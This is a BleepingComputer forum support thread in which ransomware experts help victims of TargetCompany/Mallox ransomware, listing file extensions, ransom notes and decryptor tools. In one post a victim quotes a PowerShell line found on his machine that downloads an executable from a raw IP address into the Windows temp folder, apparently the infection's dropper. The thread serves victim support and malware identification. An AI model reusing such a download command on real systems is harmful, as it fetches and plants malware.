Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Generic User Avatar

TargetCompany/Mallox Ransomware (.tohnichi, .mallox, .xollam) Support Topic


  • Please log in to reply
294 replies to this topic

#1 caohaiwang

caohaiwang

  •  Avatar image
  • Members
  • 13 posts
  • OFFLINE
  •  
  • Local time:01:07 PM

Posted 26 November 2021 - 12:27 AM

Any files that are encrypted with TargetCompany/Mallox Ransomware will have a .tohnichi, .artiis, .herrco, .mallox, .brg, .architek, .herrco, .exploit, .carone, .avast, .consultransom, .devicZz, .bozon, .acookies, .bozon3, .FARGO, .Fargo3, .milovski, .xollam, .bitenc.malox, .mawahelper, .brocamel, .encrypted, .malloxx, .ma1x0 extension appended to the end of the encrypted data filename and typically will leave files (ransom notes) named How to decrypt files.txt, HOW TO RECOVER !!.TXT, RECOVERY INFORMATION.txt, FILE RECOVERY.txt, RECOVERY INFORMATION !!!.txt, RECOVERY FILES.txt, How to decrypt files.txt, as explained here by Amigo-A (Andrew Ivanov)

 
TargetCompany Ransomware encrypts user data using a combination of ChaCha20, AES-128, Curve25519 algorithms. 
 
Avast released a free TargetCompany Ransomware utility for victims of this ransomware which may restore encrypted files under certain circumstances. However, the criminals changed the encryption process for newer variants so the Avast decryptor does not support all variants. If you have 64-bit Windows, choose the 64-bit build (avast_decryptor_targetcompany64.exe); If you have 32-bit Windows, chose the 32-bit build (avast_decryptor_targetcompany.exe). Run the executable file to start the decryptor which leads you through the configuration of the decryption process.

If the Avast decryptor does not work on the variant which infected your files, rivitna (Andrey Zhdanov) may be able to help some victims of older variants. rivitna has provided a public link to the Mallab Decryptor for victims infected by several variants.

This decryptor brutes decryption key.
To get the decryption key, you need run the decryptor on the compromised computer (!).

MallabDecryptorEx.exe -type <ENCTYPE> -key <ENCFILE>
ENCTYPE:
  old_mallox *.mallox (from October 2022 to March 2023)
  old_xollam *.xollam (January 2023)
  bitenc     *.bitenc (January 2023)
  malox      *.malox (from April 2023 to July 2023)
  mallox     *.mallox (August 2023)
  xollam     *.xollam (August 2023)
  malloxx    *.malloxx (August 2023)
  mallab     *.mallab (from September 2023 to October 2023) (by default)

ENCFILE - any encrypted file.
If successfully, 'keys.bin' will be created. You don't need to do this stage anymore.

If Windows is reinstalled or the system disk is formatted, the key can also be bruted. In this case write me.
 
Here is the list of Mallox samples supported by the decryptor.
https://github.com/rivitna/Malware/blob/main/Mallox/Supported_samples.txt

 

To brute the decryption key, you need run the decryptor only on the compromised computer!!!
If Windows has been reinstalled or if the system disk has been formatted, the key can also be bruted.
In these cases, write to me.
 
If you have become a victim of the "corporate" version of Mallox, also write to me.

The decryptor can't brute the key, if Windows has been reinstalled or if the system disk has been formatted.
The decryptor doesn't also brute the key, if attackers used the "corporate" version of Mallox.



 

My files were ENCRYPTED by the virus. I checked each encrpted file。
The encrypted file has two characteristics, one is that the file is 88 bytes longer than the original file. The second is that the last 32 bytes of each file are the same. any one can help me? thanks a lot



BC AdBot (Login to Remove)

 


#2 caohaiwang

caohaiwang
  • Topic Starter

  •  Avatar image
  • Members
  • 13 posts
  • OFFLINE
  •  
  • Local time:01:07 PM

Posted 26 November 2021 - 12:31 AM

hi,

my files were encrypted by the virus.

I check the files and found that  the encrypted file has two characteristics, one is that the file is 88 bytes longer than the original file. The second is that the last 32 bytes of each file are the same

 

I want to decrypt the file, can anyone help me?



#3 Amigo-A

Amigo-A

    Security specialist and Ransomware expert


  •  Avatar image
  • Members
  • 3,049 posts
  • ONLINE
  •  
  • Gender:Male
  • Location:Bering Strait
  • Local time:10:07 AM

Posted 26 November 2021 - 02:58 AM

This is what we call TargetCompany Ransomware

My site: The Digest "Crypto-Ransomware"  + Google Translate 

 


#4 caohaiwang

caohaiwang
  • Topic Starter

  •  Avatar image
  • Members
  • 13 posts
  • OFFLINE
  •  
  • Local time:01:07 PM

Posted 26 November 2021 - 03:58 AM

 

This is what we call TargetCompany Ransomware

 

thank you ,but which one to choose? I don't konw which one fit my case



#5 caohaiwang

caohaiwang
  • Topic Starter

  •  Avatar image
  • Members
  • 13 posts
  • OFFLINE
  •  
  • Local time:01:07 PM

Posted 26 November 2021 - 04:03 AM

and I find the bash on my computer,which may be used to download the virus

$client = New-Object System.Net.WebClient  $client.DownloadFile("http://91.243.44.21/nwnew.exe","C:\Windows\TEMP\KPUZQQ6W.exe")  


#6 caohaiwang

caohaiwang
  • Topic Starter

  •  Avatar image
  • Members
  • 13 posts
  • OFFLINE
  •  
  • Local time:01:07 PM

Posted 26 November 2021 - 04:19 AM

 

This is what we call TargetCompany Ransomware

 

thans a lot ,

I think the encryption algorithm should not be AES, because if it is AES encryption, the length of the data should be an integer multiple of 16, but the length of my file is only 88 bytes longer, and every encrypted file is like this. If it is RSA encryption, the length of the secret key should be very large, it may be some kind of replacement algorithm



#7 quietman7

quietman7

    Bleepin' Gumshoe


  •  Avatar image
  • Global Moderator
  • 61,818 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Virginia, USA
  • Local time:12:07 AM

Posted 26 November 2021 - 10:08 AM

Topic title changed to reflect naming convention and direct other victims to this support topic.


.
.
Microsoft MVP Alumni 2023Windows Insider MVP 2017-2020, MVP Reconnect 2016-2023

Microsoft MVP Consumer Security 2007-2015 kO7xOZh.gif
Member of UNITE, Unified Network of Instructors and Trusted Eliminators
Retired Police Officer, Federal Agent and Coast Guard Chief

If I have been helpful & you'd like to consider a donation, click 38WxTfO.gif


#8 Amigo-A

Amigo-A

    Security specialist and Ransomware expert


  •  Avatar image
  • Members
  • 3,049 posts
  • ONLINE
  •  
  • Gender:Male
  • Location:Bering Strait
  • Local time:10:07 AM

Posted 26 November 2021 - 11:38 AM

caohaiwang

 

Michael Gillespie will look at your encrypted .mallox files as soon as he can. Be prepared to provide them.


Edited by Amigo-A, 26 November 2021 - 11:03 PM.

My site: The Digest "Crypto-Ransomware"  + Google Translate 

 


#9 Demonslay335

Demonslay335

    Ransomware Hunter


  •  Avatar image
  • Security Colleague
  • 4,770 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:USA
  • Local time:11:07 PM

Posted 26 November 2021 - 04:22 PM

Do you have the malware executable? The link you provided is a 404...

 

I'm not seeing any link or attached files to assess.


logo-25.pngID Ransomware - Identify What Ransomware Encrypted Your Files [Support Topic]

ransomnotecleaner-25.png RansomNoteCleaner - Remove Ransom Notes Left Behind [Support Topic]

cryptosearch-25.pngCryptoSearch - Find Files Encrypted by Ransomware [Support Topic]

If I have helped you and you wish to support my ransomware fighting, you may support me here.


#10 caohaiwang

caohaiwang
  • Topic Starter

  •  Avatar image
  • Members
  • 13 posts
  • OFFLINE
  •  
  • Local time:01:07 PM

Posted 27 November 2021 - 07:21 AM

Do you have the malware executable? The link you provided is a 404...

 

I'm not seeing any link or attached files to assess.

yes,It is 404. I checked the site at the first time when I found the powershell bash file. this site  may be false evidence left by hackers to confuse me.



#11 caohaiwang

caohaiwang
  • Topic Starter

  •  Avatar image
  • Members
  • 13 posts
  • OFFLINE
  •  
  • Local time:01:07 PM

Posted 27 November 2021 - 07:24 AM

caohaiwang

 

Michael Gillespie will look at your encrypted .mallox files as soon as he can. Be prepared to provide them.

thank you and Michael Gillespie very much . if you need some .mallox files more ,give me a email ,I send you the files 



#12 caohaiwang

caohaiwang
  • Topic Starter

  •  Avatar image
  • Members
  • 13 posts
  • OFFLINE
  •  
  • Local time:01:07 PM

Posted 27 November 2021 - 09:24 AM

is it possible  AES  CTR mode ,and the last 32bytes used to mark some thing? and other 56 bytes contains the key? 



#13 caohaiwang

caohaiwang
  • Topic Starter

  •  Avatar image
  • Members
  • 13 posts
  • OFFLINE
  •  
  • Local time:01:07 PM

Posted 30 November 2021 - 06:04 AM

Has anyone decrypted it?



#14 Demonslay335

Demonslay335

    Ransomware Hunter


  •  Avatar image
  • Security Colleague
  • 4,770 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:USA
  • Local time:11:07 PM

Posted 30 November 2021 - 04:56 PM

Can you provide an encrypted file for me to check?


logo-25.pngID Ransomware - Identify What Ransomware Encrypted Your Files [Support Topic]

ransomnotecleaner-25.png RansomNoteCleaner - Remove Ransom Notes Left Behind [Support Topic]

cryptosearch-25.pngCryptoSearch - Find Files Encrypted by Ransomware [Support Topic]

If I have helped you and you wish to support my ransomware fighting, you may support me here.


#15 caohaiwang

caohaiwang
  • Topic Starter

  •  Avatar image
  • Members
  • 13 posts
  • OFFLINE
  •  
  • Local time:01:07 PM

Posted 30 November 2021 - 10:52 PM

Can you provide an encrypted file for me to check?

yes i can.  i send a message .






1 user(s) are reading this topic

0 members, 1 guests, 0 anonymous users